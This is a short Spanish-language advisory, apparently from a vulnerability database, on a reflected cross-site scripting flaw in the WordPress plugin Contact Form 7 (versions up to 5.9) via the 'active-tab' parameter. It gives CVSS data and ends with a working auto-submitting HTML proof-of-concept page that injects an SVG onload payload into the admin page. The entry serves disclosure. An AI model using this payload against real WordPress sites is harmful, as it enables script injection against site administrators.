
Contact Form 7 <= 5.9 - Cross-Site Scripting Reflejado
Contact Form 7 <= 5.9 - Cross-Site Scripting Reflejado
El plugin Contact Form 7 para WordPress es vulnerable a Cross-Site Scripting Reflejado a través del parámetro 'active-tab' en todas las versiones hasta, e incluyendo, la 5.9 debido a una insuficiente sanitización de entrada y escape de salida. Esto permite que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Necesitas conocer el valor del ID de la entrada (post) donde se encuentra el formulario, de lo contrario, cuando el administrador haga clic en el enlace no funcionará. En general, esto debería tener privilegios requeridos como Alto, ya que se necesita que un administrador haga clic en el enlace.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>